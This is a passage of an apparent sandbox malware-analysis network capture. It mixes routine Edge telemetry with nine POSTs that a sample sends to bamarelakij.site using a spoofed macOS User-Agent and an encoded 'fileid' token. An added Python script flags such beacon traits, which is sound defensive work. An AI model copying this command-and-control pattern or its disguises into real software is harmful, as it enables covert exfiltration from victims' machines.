Source: global traffic | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201107291&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3856 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
Source: global traffic | HTTP traffic detected: GET /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=10A5c11b12c97664656d6bc1736201107; XID=10A5c11b12c97664656d6bc1736201107
Source: global traffic | HTTP traffic detected: GET /c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; SM=T
Source: global traffic | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109258&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 10929 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
Source: global traffic | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109269&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 31919 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109885&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5379 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
Source: global traffic | HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201110262&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9878 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 103796
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 745
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 212
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 380
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 58769
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 69740
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  Content-Length: 147
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 35
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
  fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
  Content-Length: 53
  Host: bamarelakij.site
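The nine POSTs to bamarelakij.site are the part of this capture that matters: one fixed URL, a Safari-on-macOS User-Agent sent from a Windows guest, a non-standard fileid header, no Referer/Origin/Fetch-metadata headers, and body sizes ranging from 35 to 103796 bytes, while the OneCollector traffic is ordinary Edge new-tab telemetry. The script below is an added triage example, not part of the Joe Sandbox report and not code from the sample; it parses request heads and scores each host on exactly those traits. Its sample requests are constructed from the values above with the long query and header tokens shortened, the header allow-list and the two-trait threshold are assumptions, and the request bodies (which the report does not show) play no part.

```python
"""Triage captured HTTP request heads for beacon/exfil traits.

Added example; not part of the Joe Sandbox report and not code from the sample.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Headers a browser or stock Windows HTTP client normally sends (assumed allow-list);
# any other request header counts as custom.
STANDARD_HEADERS = {
    "host", "connection", "content-length", "content-type", "accept", "accept-encoding",
    "accept-language", "user-agent", "origin", "referer", "cookie", "cache-control",
    "sec-fetch-site", "sec-fetch-mode", "sec-fetch-dest", "sec-ch-ua",
    "sec-ch-ua-platform", "sec-ch-ua-mobile",
}


@dataclass
class Request:
    method: str
    target: str             # path plus query string, exactly as in the request line
    headers: Dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Parse a request head: one request line, then 'Name: value' lines (bodies are not captured)."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split on the first colon only; values may contain ':'
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers)


def triage(requests: List[Request], sandbox_os: str = "Windows") -> Dict[str, List[str]]:
    """Return {host: [reasons]} for hosts showing at least two beacon traits (threshold is an assumption)."""
    by_host = defaultdict(list)
    for r in requests:
        by_host[r.headers.get("host", "?")].append(r)
    findings = {}
    for host, reqs in by_host.items():
        reasons = []
        ua = reqs[0].headers.get("user-agent", "").lower()
        # 1. Platform mismatch: the client claims an OS other than the one it is running on.
        if sandbox_os.lower() == "windows" and "macintosh" in ua:
            reasons.append("User-Agent claims macOS on a Windows host")
        # 2. Custom headers: operator-defined fields such as a session or file token.
        custom = sorted({h for r in reqs for h in r.headers if h not in STANDARD_HEADERS})
        if custom:
            reasons.append("non-standard request header(s): " + ", ".join(custom))
        # 3. Repeated POSTs to one fixed URL with differing bodies: check-in plus upload on one endpoint.
        posts = [r for r in reqs if r.method == "POST"]
        sizes = {int(r.headers.get("content-length", "0")) for r in posts}
        if len(posts) >= 3 and len({r.target for r in posts}) == 1 and len(sizes) > 1:
            reasons.append(f"{len(posts)} POSTs to one fixed URL with {len(sizes)} distinct body sizes")
        # 4. A browser-looking UA that never sends Fetch-metadata, Referer or Origin is not a browser.
        if posts and "mozilla/" in ua and not any(
            h in reqs[0].headers for h in ("sec-fetch-mode", "referer", "origin")
        ):
            reasons.append("browser User-Agent but no Fetch-metadata/Referer/Origin headers")
        if len(reasons) >= 2:
            findings[host] = reasons
    return findings


# Constructed sample heads: values taken from the capture, long tokens shortened.
C2_HEAD = """POST /han.html?mdha4ek675syyz=Maox...WcA%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
fileid: UMHdxanm3Jkp...VjTIQ
Content-Length: {length}
Host: bamarelakij.site"""

TELEMETRY_HEAD = """POST /OneCollector/1.0?cors=true&client-id=NO_AUTH&upload-time={ts} HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: {length}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/"""


def sample_requests() -> List[Request]:
    """Five C2 POSTs with the body sizes seen in the capture, plus two Edge telemetry POSTs."""
    reqs = [parse_request(C2_HEAD.format(length=n)) for n in (103796, 745, 212, 147, 35)]
    reqs += [parse_request(TELEMETRY_HEAD.format(ts=ts, length=n))
             for ts, n in ((1736201109258, 10929), (1736201109269, 31919))]
    return reqs


if __name__ == "__main__":
    for host, why in triage(sample_requests()).items():
        print(host)
        for reason in why:
            print("  -", reason)
```

Run against the constructed sample, only bamarelakij.site is reported, with all four traits; the msn.com telemetry carries Origin, Referer and Sec-Fetch-* headers and a Windows User-Agent, so it scores zero. The "TCP traffic detected without corresponding DNS query" entries further down are a weaker signal in this capture: the browser resolved assets.msn.com over DNS-over-HTTPS via chrome.cloudflare-dns.com (see the DoH entries below), so the sandbox resolver never saw those lookups, whereas bamarelakij.site was resolved in the clear.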
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 108.139.47.50
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.4
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 23.57.90.149
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: global traffic | HTTP traffic detected:
  GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
  Host: clients2.googleusercontent.com
  Connection: keep-alive
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic | HTTP traffic detected:
  GET /b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
  Host: sb.scorecardresearch.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic | HTTP traffic detected:
  GET /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
  Host: sb.scorecardresearch.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
  Cookie: UID=10A5c11b12c97664656d6bc1736201107; XID=10A5c11b12c97664656d6bc1736201107
Source: global traffic | HTTP traffic detected:
  GET /c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6 HTTP/1.1
  Host: c.msn.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
  Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; SM=T
